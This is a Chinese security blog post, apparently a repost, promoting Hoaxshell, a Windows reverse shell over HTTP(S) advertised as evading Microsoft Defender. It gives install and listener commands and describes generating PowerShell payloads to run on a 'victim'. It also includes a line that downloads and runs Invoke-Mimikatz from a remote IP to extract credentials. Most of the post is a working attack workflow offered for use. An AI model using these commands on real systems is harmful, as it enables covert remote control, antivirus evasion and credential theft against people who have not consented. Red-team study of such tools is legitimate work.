红队利器 - Hoaxshell

红队利器 - Hoaxshell
2023-4-2 00:0:41 Author: 橘猫学安全(查看原文) 阅读量:19 收藏

hoaxshell 是一种非常规的 Windows 反向 shell，目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到，因为它完全基于 http(s) 流量。该工具易于使用，它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

安装

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py

重要提示：作为避免检测的一种手段，每次启动脚本时，hoaxshell 都会自动为进程中使用的自定义 http 标头的会话 ID、URL 路径和名称生成随机值。生成的有效负载仅适用于为其生成的实例。使用该-g选项绕过此行为并重新建立活动会话或使用新的 hoaxshell 实例重用过去生成的有效负载。

通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

当你运行 hoaxshell 时，它会生成自己的 PowerShell 有效负载，供你复制并注入到受害者身上。默认情况下，为方便起见，有效负载采用 base64 编码。如果您需要原始负载，请执行“rawpayload”提示命令或使用-r参数启动 hoaxshell。在受害者上执行有效负载后，您将能够针对它运行 PowerShell 命令。

加密的 shell 会话（https）

# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

由于禁用 ssl 证书验证的附加代码块，生成的 PowerShell 有效负载的长度将更长。

如果您不小心关闭了终端、断电或其他情况，您可以在抓取会话模式下启动 hoaxshell，它会尝试重新建立会话，因为有效负载仍在受害机器上运行。

sudo python3 hoaxshell.py -s <your_ip> -g

重要提示：确保使用与您尝试恢复的会话相同的设置（http/https、端口等）启动 hoaxshell。

如果您执行启动交互式会话的命令，shell 将会挂起

# this command will execute succesfully and you will have no problem: > powershell echo 'This is a test'# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:> powershell# In the same manner, you won't have a problem executing this:> cmd /c dir /a# But this will cause your hoaxshell to hang:> cmd.exe

因此，例如，如果您想通过 hoaxshell 运行 mimikatz，则需要调用以下命令

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

如有侵权，请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「超详细 | 分享」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具｜无状态子域名爆破工具（1秒扫160万个子域）

查看更多精彩内容，还请关注橘猫学安全：

每日坚持学习与分享，觉得文章对你有帮助可在底部给点个“再看”

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247506552&idx=1&sn=d308f9412c4d4f3b9302a7fde174fd7a&chksm=c04d5d46f73ad4502936057f7f2f6af1e276141e1c9cd5f4311f8a206c7f26c0f7475aafe0b7#rd
如有侵权请联系:admin#unsafe.sh